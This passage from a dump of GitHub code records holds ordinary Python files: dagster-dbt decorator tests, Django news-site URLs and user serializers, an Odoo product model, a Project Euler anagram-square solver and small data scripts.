range(len(data.SAMPLEID)):\n# data.SAMPLEID2[x] = \"BB_\" + str(data.SAMPLEID[x]) \n\n sample_metadata = data[['AGE', 'BBTYPE', 'ETHNICITY', 'GENDER', 'LOCATION', 'SAMPLEID']]\n xyz = []\n for x 
in range(len(sample_metadata.SAMPLEID)):\n xyz.append(\"BB_\" + str(sample_metadata.SAMPLEID[x]))\n sample_metadata = sample_metadata.assign(SAMPLEID2=xyz)\n sample_metadata1=pd.DataFrame(sample_metadata['AGE'].astype(int))\n sample_metadata1['BBTYPE']=sample_metadata['BBTYPE'].astype(str)\n sample_metadata1['ETHNICITY']=sample_metadata['ETHNICITY'].astype(str)\n sample_metadata1['GENDER']=sample_metadata['GENDER'].astype(str)\n sample_metadata1['LOCATION']=sample_metadata['LOCATION'].astype(str)\n sample_metadata1['SAMPLEID']=sample_metadata['SAMPLEID'].astype(int)\n sample_metadata1['SAMPLEID2']=sample_metadata['SAMPLEID2'].astype(str)\n \n sample_metadata1.set_index(\"SAMPLEID2\", inplace=True)\n \n sample_metadata1 = sample_metadata1.transpose()\n \n metadata_list = []\n for x in range(len(sample_metadata1.columns)):\n metadata_info = {}\n col = sample_metadata1.columns[x]\n metadata_info['AGE'] = sample_metadata1[col]['AGE']\n metadata_info['BBTYPE'] = sample_metadata1[col]['BBTYPE']\n metadata_info['ETHNICITY'] = sample_metadata1[col]['ETHNICITY']\n metadata_info['GENDER'] = sample_metadata1[col]['GENDER']\n metadata_info['LOCATION'] = sample_metadata1[col]['LOCATION']\n metadata_info['SAMPLEID'] = sample_metadata1[col]['SAMPLEID']\n metadata_sample = {}\n metadata_sample[col]=metadata_info\n metadata_list.append(metadata_sample)\n print(metadata_list)\n\nget_metadata()","repo_name":"Niyatihd/interactivevisualizationchallenge","sub_path":"d123.py","file_name":"d123.py","file_ext":"py","file_size_in_byte":9656,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14428695949","text":"\"\"\"\nEnvironment Informations for the Erina Project\\n\n\nErina Project\\n\n© Anime no Sekai - 2020\n\"\"\"\n\n\nimport os\nimport sys\nimport pkg_resources\nimport time\n\n\n##### SYSTEM AND PROCESS INFO\ntry:\n _ = startTime\nexcept:\n startTime = time.time()\ncpu_count = os.cpu_count()\nworking_dir = os.getcwd()\npid = os.getpid()\nsystem = os.name\n\n##### PYTHON INFO\npython_version = sys.version\npython_version_info = sys.version_info\npython_implementation = sys.implementation\npython_apiversion = sys.api_version\npython_executable_path = sys.executable\npython_builtin_module_names = sys.builtin_module_names\npython_path = sys.path\npython_installed_modules = []\nfor pkg in pkg_resources.working_set:\n python_installed_modules.append(pkg)\n\n##### ENV INFO\nerina_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nerina_version = \"v2.0-024 (Beta)\"\n","repo_name":"Animenosekai/Project_Erina","sub_path":"Erina/env_information.py","file_name":"env_information.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"53"} +{"seq_id":"9892764107","text":"import json\nimport os\nfrom pathlib import Path\nfrom typing import AbstractSet, Any, Mapping, Optional\n\nimport pytest\nfrom dagster import (\n AssetKey,\n AutoMaterializePolicy,\n BackfillPolicy,\n DagsterInvalidDefinitionError,\n DailyPartitionsDefinition,\n Definitions,\n DependencyDefinition,\n FreshnessPolicy,\n LastPartitionMapping,\n NodeInvocation,\n PartitionMapping,\n PartitionsDefinition,\n TimeWindowPartitionMapping,\n asset,\n)\nfrom dagster._core.definitions.utils import DEFAULT_IO_MANAGER_KEY\nfrom dagster._core.execution.context.compute import AssetExecutionContext\nfrom dagster_dbt.asset_decorator import dbt_assets\nfrom dagster_dbt.core.resources_v2 import DbtCliResource\nfrom 
dagster_dbt.dagster_dbt_translator import DagsterDbtTranslator\nfrom dagster_dbt.dbt_manifest import DbtManifestParam\n\npytest.importorskip(\"dbt.version\", minversion=\"1.4\")\n\n\nmanifest_path = Path(__file__).joinpath(\"..\", \"sample_manifest.json\").resolve()\nmanifest = json.loads(manifest_path.read_bytes())\n\ntest_dagster_metadata_manifest_path = (\n Path(__file__)\n .joinpath(\"..\", \"dbt_projects\", \"test_dagster_metadata\", \"manifest.json\")\n .resolve()\n)\ntest_dagster_metadata_manifest = json.loads(test_dagster_metadata_manifest_path.read_bytes())\n\ntest_python_interleaving_manifest_path = (\n Path(__file__)\n .joinpath(\"..\", \"dbt_projects\", \"test_dagster_dbt_python_interleaving\", \"manifest.json\")\n .resolve()\n)\ntest_python_interleaving_manifest = json.loads(test_python_interleaving_manifest_path.read_bytes())\n\n\n@pytest.mark.parametrize(\"manifest\", [manifest, manifest_path, os.fspath(manifest_path)])\ndef test_manifest_argument(manifest: DbtManifestParam):\n @dbt_assets(manifest=manifest)\n def my_dbt_assets():\n ...\n\n assert my_dbt_assets.keys == {\n AssetKey.from_user_string(key)\n for key in [\n \"sort_by_calories\",\n \"cold_schema/sort_cold_cereals_by_calories\",\n \"subdir_schema/least_caloric\",\n \"sort_hot_cereals_by_calories\",\n \"orders_snapshot\",\n \"cereals\",\n ]\n }\n\n\n@pytest.mark.parametrize(\n \"select,exclude,expected_asset_names\",\n [\n (\n \"*\",\n None,\n {\n \"sort_by_calories\",\n \"cold_schema/sort_cold_cereals_by_calories\",\n \"subdir_schema/least_caloric\",\n \"sort_hot_cereals_by_calories\",\n \"orders_snapshot\",\n \"cereals\",\n },\n ),\n (\n \"+least_caloric\",\n None,\n {\"sort_by_calories\", \"subdir_schema/least_caloric\", \"cereals\"},\n ),\n (\n \"sort_by_calories least_caloric\",\n None,\n {\"sort_by_calories\", \"subdir_schema/least_caloric\"},\n ),\n (\n \"tag:bar+\",\n None,\n {\n \"sort_by_calories\",\n \"cold_schema/sort_cold_cereals_by_calories\",\n \"subdir_schema/least_caloric\",\n \"sort_hot_cereals_by_calories\",\n \"orders_snapshot\",\n },\n ),\n (\n \"tag:foo\",\n None,\n {\"sort_by_calories\", \"cold_schema/sort_cold_cereals_by_calories\"},\n ),\n (\n \"tag:foo,tag:bar\",\n None,\n {\"sort_by_calories\"},\n ),\n (\n None,\n \"sort_hot_cereals_by_calories\",\n {\n \"sort_by_calories\",\n \"cold_schema/sort_cold_cereals_by_calories\",\n \"subdir_schema/least_caloric\",\n \"cereals\",\n \"orders_snapshot\",\n },\n ),\n (\n None,\n \"+least_caloric\",\n {\n \"cold_schema/sort_cold_cereals_by_calories\",\n \"sort_hot_cereals_by_calories\",\n \"orders_snapshot\",\n },\n ),\n (\n None,\n \"sort_by_calories least_caloric\",\n {\n \"cold_schema/sort_cold_cereals_by_calories\",\n \"sort_hot_cereals_by_calories\",\n \"orders_snapshot\",\n \"cereals\",\n },\n ),\n (\n None,\n \"tag:foo\",\n {\n \"subdir_schema/least_caloric\",\n \"sort_hot_cereals_by_calories\",\n \"orders_snapshot\",\n \"cereals\",\n },\n ),\n (\n \"*\",\n \"tag:does-not-exist\",\n {\n \"sort_by_calories\",\n \"cold_schema/sort_cold_cereals_by_calories\",\n \"subdir_schema/least_caloric\",\n \"sort_hot_cereals_by_calories\",\n \"orders_snapshot\",\n \"cereals\",\n },\n ),\n ],\n)\ndef test_selections(\n select: Optional[str], exclude: Optional[str], expected_asset_names: AbstractSet[str]\n) -> None:\n @dbt_assets(\n manifest=manifest,\n select=select or \"fqn:*\",\n exclude=exclude,\n )\n def my_dbt_assets():\n ...\n\n expected_asset_keys = {AssetKey(key.split(\"/\")) for key in expected_asset_names}\n assert my_dbt_assets.keys == 
expected_asset_keys\n\n expected_select_tag = \"fqn:*\" if select is None else select\n assert my_dbt_assets.op.tags.get(\"dagster-dbt/select\") == expected_select_tag\n assert my_dbt_assets.op.tags.get(\"dagster-dbt/exclude\") == exclude\n\n\n@pytest.mark.parametrize(\"name\", [None, \"custom\"])\ndef test_with_custom_name(name: Optional[str]) -> None:\n @dbt_assets(manifest=manifest, name=name)\n def my_dbt_assets():\n ...\n\n expected_name = name or \"my_dbt_assets\"\n\n assert my_dbt_assets.op.name == expected_name\n\n\n@pytest.mark.parametrize(\n \"partitions_def\", [None, DailyPartitionsDefinition(start_date=\"2023-01-01\")]\n)\ndef test_partitions_def(partitions_def: Optional[PartitionsDefinition]) -> None:\n @dbt_assets(manifest=manifest, partitions_def=partitions_def)\n def my_dbt_assets():\n ...\n\n assert my_dbt_assets.partitions_def == partitions_def\n\n\n@pytest.mark.parametrize(\"io_manager_key\", [None, \"my_io_manager_key\"])\ndef test_io_manager_key(io_manager_key: Optional[str]) -> None:\n @dbt_assets(manifest=manifest, io_manager_key=io_manager_key)\n def my_dbt_assets():\n ...\n\n expected_io_manager_key = DEFAULT_IO_MANAGER_KEY if io_manager_key is None else io_manager_key\n\n for output_def in my_dbt_assets.node_def.output_defs:\n assert output_def.io_manager_key == expected_io_manager_key\n\n\ndef test_backfill_policy():\n backfill_policy = BackfillPolicy.single_run()\n\n @dbt_assets(\n manifest=manifest,\n partitions_def=DailyPartitionsDefinition(start_date=\"2023-01-01\"),\n backfill_policy=backfill_policy,\n )\n def my_dbt_assets():\n ...\n\n assert my_dbt_assets.backfill_policy == backfill_policy\n\n\ndef test_op_tags():\n @dbt_assets(manifest=manifest, op_tags={\"a\": \"b\", \"c\": \"d\"})\n def my_dbt_assets():\n ...\n\n assert my_dbt_assets.op.tags == {\n \"a\": \"b\",\n \"c\": \"d\",\n \"kind\": \"dbt\",\n \"dagster-dbt/select\": \"fqn:*\",\n }\n\n @dbt_assets(manifest=manifest, op_tags={\"a\": \"b\", \"c\": \"d\"}, select=\"+least_caloric\")\n def my_dbt_assets_with_select():\n ...\n\n assert my_dbt_assets_with_select.op.tags == {\n \"a\": \"b\",\n \"c\": \"d\",\n \"kind\": \"dbt\",\n \"dagster-dbt/select\": \"+least_caloric\",\n }\n\n @dbt_assets(manifest=manifest, op_tags={\"a\": \"b\", \"c\": \"d\"}, exclude=\"+least_caloric\")\n def my_dbt_assets_with_exclude():\n ...\n\n assert my_dbt_assets_with_exclude.op.tags == {\n \"a\": \"b\",\n \"c\": \"d\",\n \"kind\": \"dbt\",\n \"dagster-dbt/exclude\": \"+least_caloric\",\n \"dagster-dbt/select\": \"fqn:*\",\n }\n\n @dbt_assets(\n manifest=manifest,\n op_tags={\"a\": \"b\", \"c\": \"d\"},\n select=\"+least_caloric\",\n exclude=\"least_caloric\",\n )\n def my_dbt_assets_with_select_and_exclude():\n ...\n\n assert my_dbt_assets_with_select_and_exclude.op.tags == {\n \"a\": \"b\",\n \"c\": \"d\",\n \"kind\": \"dbt\",\n \"dagster-dbt/select\": \"+least_caloric\",\n \"dagster-dbt/exclude\": \"least_caloric\",\n }\n\n with pytest.raises(\n DagsterInvalidDefinitionError,\n match=(\n \"To specify a dbt selection, use the 'select' argument, not 'dagster-dbt/select'\"\n \" with op_tags\"\n ),\n ):\n\n @dbt_assets(\n manifest=manifest,\n op_tags={\n \"a\": \"b\",\n \"c\": \"d\",\n \"dagster-dbt/select\": \"+least_caloric\",\n },\n )\n def select_tag():\n ...\n\n with pytest.raises(\n DagsterInvalidDefinitionError,\n match=(\n \"To specify a dbt exclusion, use the 'exclude' argument, not 'dagster-dbt/exclude'\"\n \" with op_tags\"\n ),\n ):\n\n @dbt_assets(\n manifest=manifest,\n op_tags={\n \"a\": \"b\",\n \"c\": 
\"d\",\n \"dagster-dbt/exclude\": \"+least_caloric\",\n },\n )\n def exclude_tag():\n ...\n\n\ndef test_with_asset_key_replacements() -> None:\n class CustomizedDagsterDbtTranslator(DagsterDbtTranslator):\n @classmethod\n def get_asset_key(cls, dbt_resource_props: Mapping[str, Any]) -> AssetKey:\n return AssetKey([\"prefix\", *super().get_asset_key(dbt_resource_props).path])\n\n @dbt_assets(manifest=manifest, dagster_dbt_translator=CustomizedDagsterDbtTranslator())\n def my_dbt_assets():\n ...\n\n assert my_dbt_assets.keys_by_input_name == {\n \"__subset_input__cereals\": AssetKey([\"prefix\", \"cereals\"]),\n \"__subset_input__sort_by_calories\": AssetKey([\"prefix\", \"sort_by_calories\"]),\n }\n assert set(my_dbt_assets.keys_by_output_name.values()) == {\n AssetKey([\"prefix\", \"cereals\"]),\n AssetKey([\"prefix\", \"cold_schema\", \"sort_cold_cereals_by_calories\"]),\n AssetKey([\"prefix\", \"subdir_schema\", \"least_caloric\"]),\n AssetKey([\"prefix\", \"orders_snapshot\"]),\n AssetKey([\"prefix\", \"sort_hot_cereals_by_calories\"]),\n AssetKey([\"prefix\", \"sort_by_calories\"]),\n }\n\n\n@pytest.mark.parametrize(\n \"partition_mapping\",\n [\n None,\n LastPartitionMapping(),\n TimeWindowPartitionMapping(start_offset=-1, end_offset=-1),\n ],\n)\ndef test_with_partition_mappings(partition_mapping: Optional[PartitionMapping]) -> None:\n expected_self_dependency_partition_mapping = TimeWindowPartitionMapping(\n start_offset=-8, end_offset=-9\n )\n\n class CustomizedDagsterDbtTranslator(DagsterDbtTranslator):\n @classmethod\n def get_partition_mapping(\n cls,\n dbt_resource_props: Mapping[str, Any],\n dbt_parent_resource_props: Mapping[str, Any],\n ) -> Optional[PartitionMapping]:\n is_self_dependency = dbt_resource_props == dbt_parent_resource_props\n if is_self_dependency:\n return expected_self_dependency_partition_mapping\n\n return partition_mapping\n\n @dbt_assets(\n manifest=test_dagster_metadata_manifest,\n dagster_dbt_translator=CustomizedDagsterDbtTranslator(),\n partitions_def=DailyPartitionsDefinition(start_date=\"2023-10-01\"),\n )\n def my_dbt_assets():\n ...\n\n dependencies_with_self_dependencies = {\n # Self dependency enabled with `+meta.dagster.has_self_dependency`\n AssetKey(\"customers\"),\n }\n dependencies_without_self_dependencies = set(my_dbt_assets.dependency_keys).difference(\n my_dbt_assets.keys\n )\n\n assert dependencies_without_self_dependencies\n for input_asset_key in dependencies_without_self_dependencies:\n assert my_dbt_assets.get_partition_mapping(input_asset_key) == partition_mapping\n\n for self_dependency_asset_key in dependencies_with_self_dependencies:\n assert (\n my_dbt_assets.get_partition_mapping(self_dependency_asset_key)\n == expected_self_dependency_partition_mapping\n )\n\n\ndef test_with_description_replacements() -> None:\n expected_description = \"customized description\"\n\n class CustomizedDagsterDbtTranslator(DagsterDbtTranslator):\n @classmethod\n def get_description(cls, dbt_resource_props: Mapping[str, Any]) -> str:\n return expected_description\n\n @dbt_assets(manifest=manifest, dagster_dbt_translator=CustomizedDagsterDbtTranslator())\n def my_dbt_assets():\n ...\n\n for description in my_dbt_assets.descriptions_by_key.values():\n assert description == expected_description\n\n\ndef test_with_metadata_replacements() -> None:\n expected_metadata = {\"customized\": \"metadata\"}\n\n class CustomizedDagsterDbtTranslator(DagsterDbtTranslator):\n @classmethod\n def get_metadata(cls, dbt_resource_props: Mapping[str, Any]) -> 
Mapping[str, Any]:\n return expected_metadata\n\n @dbt_assets(manifest=manifest, dagster_dbt_translator=CustomizedDagsterDbtTranslator())\n def my_dbt_assets():\n ...\n\n for metadata in my_dbt_assets.metadata_by_key.values():\n assert metadata[\"customized\"] == \"metadata\"\n\n\ndef test_with_group_replacements() -> None:\n expected_group = \"customized_group\"\n\n class CustomizedDagsterDbtTranslator(DagsterDbtTranslator):\n @classmethod\n def get_group_name(cls, dbt_resource_props: Mapping[str, Any]) -> Optional[str]:\n return expected_group\n\n @dbt_assets(manifest=manifest, dagster_dbt_translator=CustomizedDagsterDbtTranslator())\n def my_dbt_assets():\n ...\n\n for group in my_dbt_assets.group_names_by_key.values():\n assert group == expected_group\n\n\ndef test_with_freshness_policy_replacements() -> None:\n expected_freshness_policy = FreshnessPolicy(maximum_lag_minutes=60)\n\n class CustomizedDagsterDbtTranslator(DagsterDbtTranslator):\n @classmethod\n def get_freshness_policy(\n cls, dbt_resource_props: Mapping[str, Any]\n ) -> Optional[FreshnessPolicy]:\n return expected_freshness_policy\n\n @dbt_assets(manifest=manifest, dagster_dbt_translator=CustomizedDagsterDbtTranslator())\n def my_dbt_assets():\n ...\n\n for freshness_policy in my_dbt_assets.freshness_policies_by_key.values():\n assert freshness_policy == expected_freshness_policy\n\n\ndef test_with_auto_materialize_policy_replacements() -> None:\n expected_auto_materialize_policy = AutoMaterializePolicy.eager()\n\n class CustomizedDagsterDbtTranslator(DagsterDbtTranslator):\n @classmethod\n def get_auto_materialize_policy(\n cls, dbt_resource_props: Mapping[str, Any]\n ) -> Optional[AutoMaterializePolicy]:\n return expected_auto_materialize_policy\n\n @dbt_assets(manifest=manifest, dagster_dbt_translator=CustomizedDagsterDbtTranslator())\n def my_dbt_assets():\n ...\n\n for auto_materialize_policy in my_dbt_assets.auto_materialize_policies_by_key.values():\n assert auto_materialize_policy == expected_auto_materialize_policy\n\n\ndef test_dbt_meta_auto_materialize_policy() -> None:\n @dbt_assets(manifest=test_dagster_metadata_manifest)\n def my_dbt_assets():\n ...\n\n auto_materialize_policies = my_dbt_assets.auto_materialize_policies_by_key.values()\n assert auto_materialize_policies\n\n for auto_materialize_policy in auto_materialize_policies:\n assert auto_materialize_policy == AutoMaterializePolicy.eager()\n\n\ndef test_dbt_meta_freshness_policy() -> None:\n @dbt_assets(manifest=test_dagster_metadata_manifest)\n def my_dbt_assets():\n ...\n\n freshness_policies = my_dbt_assets.freshness_policies_by_key.values()\n assert freshness_policies\n\n for freshness_policy in freshness_policies:\n assert freshness_policy == FreshnessPolicy(\n maximum_lag_minutes=60.0, cron_schedule=\"* * * * *\"\n )\n\n\ndef test_dbt_meta_asset_key() -> None:\n @dbt_assets(manifest=test_dagster_metadata_manifest)\n def my_dbt_assets():\n ...\n\n # Assert that source asset keys are set properly.\n assert AssetKey([\"customized\", \"source\", \"jaffle_shop\", \"main\", \"raw_customers\"]) in set(\n my_dbt_assets.keys_by_input_name.values()\n )\n\n # Assert that models asset keys are set properly.\n assert {\n AssetKey([\"customized\", \"staging\", \"customers\"]),\n AssetKey([\"customized\", \"staging\", \"orders\"]),\n AssetKey([\"customized\", \"staging\", \"payments\"]),\n }.issubset(my_dbt_assets.keys)\n\n\ndef test_dbt_config_group() -> None:\n @dbt_assets(manifest=test_dagster_metadata_manifest)\n def my_dbt_assets():\n ...\n\n assert 
my_dbt_assets.group_names_by_key == {\n AssetKey([\"customers\"]): \"default\",\n # If a model has a Dagster group name specified under `meta`, use that.\n AssetKey([\"customized\", \"staging\", \"customers\"]): \"customized_dagster_group\",\n # If a model has a dbt group name specified under `group`, use that.\n AssetKey([\"customized\", \"staging\", \"orders\"]): \"customized_dbt_group\",\n # If a model has both a Dagster group and dbt group, use the Dagster group.\n AssetKey([\"customized\", \"staging\", \"payments\"]): \"customized_dagster_group\",\n AssetKey([\"orders\"]): \"default\",\n AssetKey([\"raw_customers\"]): \"default\",\n AssetKey([\"raw_orders\"]): \"default\",\n AssetKey([\"raw_payments\"]): \"default\",\n }\n\n\ndef test_dbt_with_downstream_asset_via_definition():\n @dbt_assets(manifest=test_dagster_metadata_manifest)\n def my_dbt_assets():\n ...\n\n @asset(deps=[my_dbt_assets])\n def downstream_of_dbt():\n return None\n\n assert len(downstream_of_dbt.input_names) == 8\n for input_name in downstream_of_dbt.input_names:\n assert downstream_of_dbt.op.ins[input_name].dagster_type.is_nothing\n\n\ndef test_dbt_with_downstream_asset():\n @dbt_assets(manifest=test_dagster_metadata_manifest)\n def my_dbt_assets():\n ...\n\n @asset(deps=[AssetKey(\"orders\"), AssetKey([\"customized\", \"staging\", \"payments\"])])\n def downstream_of_dbt():\n return None\n\n assert len(downstream_of_dbt.input_names) == 2\n assert downstream_of_dbt.op.ins[\"orders\"].dagster_type.is_nothing\n assert downstream_of_dbt.op.ins[\"customized_staging_payments\"].dagster_type.is_nothing\n\n\ndef test_dbt_with_python_interleaving() -> None:\n @dbt_assets(manifest=test_python_interleaving_manifest)\n def my_dbt_assets(context: AssetExecutionContext, dbt: DbtCliResource):\n yield from dbt.cli([\"build\"], context=context).stream()\n\n assert set(my_dbt_assets.keys_by_input_name.values()) == {\n AssetKey([\"dagster\", \"python_augmented_customers\"]),\n # these inputs are necessary for copies of this asset to properly reflect the dependencies\n # of this asset when it is automatically subset\n AssetKey(\"raw_customers\"),\n AssetKey(\"raw_orders\"),\n AssetKey(\"raw_payments\"),\n AssetKey(\"stg_orders\"),\n AssetKey(\"stg_payments\"),\n }\n\n @asset(key_prefix=\"dagster\", deps=[\"raw_customers\"])\n def python_augmented_customers():\n ...\n\n defs = Definitions(\n assets=[my_dbt_assets, python_augmented_customers],\n resources={\n \"dbt\": DbtCliResource(\n project_dir=test_python_interleaving_manifest_path.parent.absolute().as_posix()\n )\n },\n )\n global_job = defs.get_implicit_global_asset_job_def()\n # my_dbt_assets gets split up\n assert global_job.dependencies == {\n # no dependencies for the first invocation of my_dbt_assets\n NodeInvocation(name=\"my_dbt_assets\", alias=\"my_dbt_assets_2\"): {},\n # the python augmented customers asset depends on the second invocation of my_dbt_assets\n NodeInvocation(name=\"dagster__python_augmented_customers\"): {\n \"raw_customers\": DependencyDefinition(node=\"my_dbt_assets_2\", output=\"raw_customers\")\n },\n # the second invocation of my_dbt_assets depends on the first, and the python step\n NodeInvocation(name=\"my_dbt_assets\"): {\n \"__subset_input__stg_orders\": DependencyDefinition(\n node=\"my_dbt_assets_2\", output=\"stg_orders\"\n ),\n \"__subset_input__stg_payments\": DependencyDefinition(\n node=\"my_dbt_assets_2\", output=\"stg_payments\"\n ),\n \"dagster_python_augmented_customers\": DependencyDefinition(\n 
node=\"dagster__python_augmented_customers\", output=\"result\"\n ),\n },\n }\n # two distinct node definitions, but 3 nodes overall\n assert len(global_job.all_node_defs) == 2\n assert len(global_job.nodes) == 3\n\n result = global_job.execute_in_process()\n assert result.success\n\n # now make sure that if you just select these two, we still get a valid dependency graph (where)\n # customers executes after its parent \"stg_orders\", even though the python step is not selected\n subset_job = global_job.get_subset(\n asset_selection={AssetKey(\"stg_orders\"), AssetKey(\"customers\")}\n )\n assert subset_job.dependencies == {\n # no dependencies for the first invocation of my_dbt_assets\n NodeInvocation(name=\"my_dbt_assets\", alias=\"my_dbt_assets_2\"): {},\n # the second invocation of my_dbt_assets depends on the first\n NodeInvocation(name=\"my_dbt_assets\"): {\n \"__subset_input__stg_orders\": DependencyDefinition(\n node=\"my_dbt_assets_2\", output=\"stg_orders\"\n )\n },\n }\n result = subset_job.execute_in_process()\n assert result.success\n","repo_name":"dagster-io/dagster","sub_path":"python_modules/libraries/dagster-dbt/dagster_dbt_tests/test_asset_decorator.py","file_name":"test_asset_decorator.py","file_ext":"py","file_size_in_byte":21709,"program_lang":"python","lang":"en","doc_type":"code","stars":8986,"dataset":"github-code","pt":"53"} +{"seq_id":"3472175315","text":"from django.urls import path, re_path\nfrom .views import *\n\nfrom django.views.decorators.cache import cache_page # импортируем декоратор \n#для кэширования отдельного представления\n\nurlpatterns = [\n\n\n # кеширование страницы\n #path('',cache_page(60)( NewsListMain.as_view()), name = 'home' ),\n \n path('', NewsListMain.as_view(), name = 'home' ),\n re_path(r'^index/', NewsListMain.as_view(), name = 'home'),\n re_path(r'^news/', NewsList.as_view(), name = 'news_page' ),\n \n path('', NewsDetail.as_view(), name = 'o_news'),\n path('search', SearchList.as_view(), name = 'search' ),\n\n #path('edit/', cache_page(10)(NewsEditView.as_view()), name = 'edit'),\n path('edit/', NewsEditView.as_view(), name = 'edit'),\n #path('/', NewsDetail.aus_view(), name = 'detail_news'),\n\n #страница закеширована \n #path('add_news/', cache_page(5)(AddNewsCreate.as_view()), name = 'add_news' ),\n path('add_news/', AddNewsCreate.as_view(), name = 'add_news' ),\n \n path('update_news//', NewsUpdateView.as_view(), name = 'edit_news'),\n path('delete//', NewsDeleteView.as_view(), name='news_delete'),\n \n #path('category_news//', NewsCategory.as_view(), name = 'category') тоже работает в строке дает назв категории\n path('category_news/', NewsCategory.as_view(), name = 'category'),\n \n path('subscribe//', subCategory, name ='subcat'),\n path('unsubscribe//', unsubCategory, name ='unsubcat'),\n \n \n #path('one_news/', news, name='one_news'),\n]\n","repo_name":"VetN/moduleD2_homework","sub_path":"NewsPaper/news/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1701,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13169934666","text":"import csv\n\nmovies=dict()\nwith open(\"favorites.csv\",\"r\") as file:\n reader = csv.DictReader(file)\n for row in reader:\n m = row[\"title\"].strip().upper()\n if not m in movies:\n movies[m] = 0\n movies[m]+=1\n\n\nfor m in sorted(movies,key=lambda #function with no name,only one time usage\n title:movies[title]#title - argument, movies(title)-return value\n ,reverse=True):\n 
print(m,movies[m])","repo_name":"subramanivasu/CS_Learnings","sub_path":"cs50/favourites5.py","file_name":"favourites5.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70474641768","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport shared\nimport collections\nimport math\n\n# By replacing each of the letters in the word CARE with 1, 2, 9, and\n# 6 respectively, we form a square number: 1296 = 362. What is\n# remarkable is that, by using the same digital substitutions, the\n# anagram, RACE, also forms a square number: 9216 = 962. We shall call\n# CARE (and RACE) a square anagram word pair and specify further that\n# leading zeroes are not permitted, neither may a different letter\n# have the same digital value as another letter.\n\n# Using words.txt (right click and 'Save Link/Target As...'), a 16K\n# text file containing nearly two-thousand common English words, find\n# all the square anagram word pairs (a palindromic word is NOT\n# considered to be an anagram of itself).\n\n# What is the largest square number formed by any member of such a\n# pair?\n\n# NOTE: All anagrams formed must be contained in the given text file.\n\nexpected = 18769\n\n# def letter_value(letter):\n# return ord(letter) - 0x40 # ord('A') == 0x41\n\n# def word_value(word):\n# value = 0\n# for letter in word:\n# l = letter_value(letter)\n# value *= 10\n# if l >= 10:\n# value *= 10\n# value += l\n# return value\n \n\ndef are_squares(word1, word2, square):\n replacement_map = {}\n position = -1\n shrinking_square = square\n while shrinking_square > 0:\n shrinking_square, digit = divmod(shrinking_square, 10)\n replacement_map[str(digit)] = word1[position]\n position -= 1\n\n for digit, letter in replacement_map.items():\n word1 = word1.replace(letter, digit)\n\n try:\n if int(word1, 10) != square:\n return False\n except:\n return False\n \n for digit, letter in replacement_map.items():\n word2 = word2.replace(letter, digit)\n \n if word2[0] != '0':\n square2 = int(word2, 10)\n root2 = math.sqrt(square2)\n if int(root2) == root2:\n return True\n return False\n\n\ndef get_highest(word1, word2):\n\n best = 0\n highest_square = 10**len(word1)-1\n lowest_square = highest_square/10+1\n\n lowest_root = int(math.sqrt(lowest_square))\n root = int(math.sqrt(highest_square))\n\n while root > lowest_root:\n square = root**2\n\n if are_squares(word1, word2, square):\n return max(best, square)\n\n if are_squares(word2, word1, square):\n return max(best, square)\n root -= 1\n return 0\n\ndef solve():\n word_groups = collections.defaultdict(list)\n words = file('words.txt').read().replace('\"', '').split(',')\n words.sort(key=len)\n for word in words:\n chars = list(word)\n chars.sort()\n\n if len(chars) <= 10:\n word_groups[tuple(chars)].append(word)\n word_groups = [group for group in word_groups.values() if len(group) > 1]\n word_groups.sort(lambda g1, g2: cmp(len(g2[0]), len(g1[0])))\n\n best = 0\n for group in word_groups:\n for i in range(len(group)):\n for j in range(i+1, len(group)):\n best = max(best, get_highest(group[i], group[j]))\n return best\n","repo_name":"blairconrad/notions","sub_path":"Euler/q00098/q00098.py","file_name":"q00098.py","file_ext":"py","file_size_in_byte":3147,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6327976216","text":"from odoo import fields, models, api, _\n\n\nclass ProductTemplateInherit(models.Model):\n _inherit 
= 'product.template'\n \n invoices_count = fields.Integer(string=\"Sales\", compute=\"get_invoices_count\")\n \n @api.multi\n def open_account_invoice_lines(self):\n return {\n 'name': _('Account Invoice Lines'),\n 'domain': [('product_id', '=', self.id)],\n 'view_type': 'form',\n 'res_model': 'account.invoice.line',\n 'view_id': False,\n 'view_mode': 'tree,form',\n 'type': 'ir.actions.act_window',\n }\n \n def get_invoices_count(self):\n # cur_product_id = self.product_id.id\n report = self.env['account.invoice.line']\n count = report.search_count([('product_id', '=', self.id)])\n self.invoices_count = count\n","repo_name":"darlamichhane/OdooModules","sub_path":"cfc_extra/models/cfc_product.py","file_name":"cfc_product.py","file_ext":"py","file_size_in_byte":834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30339481117","text":"from django.contrib.auth import get_user_model\nfrom rest_framework import serializers\nfrom rest_auth.registration.serializers import RegisterSerializer\nfrom allauth.account.adapter import get_adapter\nfrom allauth.account.utils import setup_user_email\n\n\nUser = get_user_model()\nhost_url = 'http://childrenzip.site'\n\nclass UserSerializer(serializers.ModelSerializer):\n profile_image = serializers.SerializerMethodField()\n \n def get_profile_image(self, obj):\n try: img = obj.profile_image.url\n except: return None\n return host_url + img\n\n class Meta:\n model = User\n exclude = ['password']\n\nclass UserListSerializer(serializers.ModelSerializer):\n profile_image = serializers.SerializerMethodField()\n\n def get_profile_image(self, obj):\n try: img = obj.profile_image.url\n except: return None\n return host_url + img\n\n class Meta:\n model = User\n fields = ['id', 'username', 'nickname', 'profile_image']\n\nclass CustomRegisterSerializer(serializers.ModelSerializer, RegisterSerializer):\n class Meta:\n model = User\n fields = [\n 'username', 'email', 'password1', 'password2', 'latitude', 'longitude',\n 'address', 'nickname', 'is_director', 'kindergarten_id', 'profile_image'\n ]\n\n def save(self, request):\n adapter = get_adapter()\n user = adapter.new_user(request)\n self.cleaned_data = self.get_cleaned_data()\n adapter.save_user(request, user, self)\n self.custom_signup(request, user)\n setup_user_email(request, user, [])\n return user\n\nclass UserUpdateSerializer(serializers.ModelSerializer):\n profile_image = 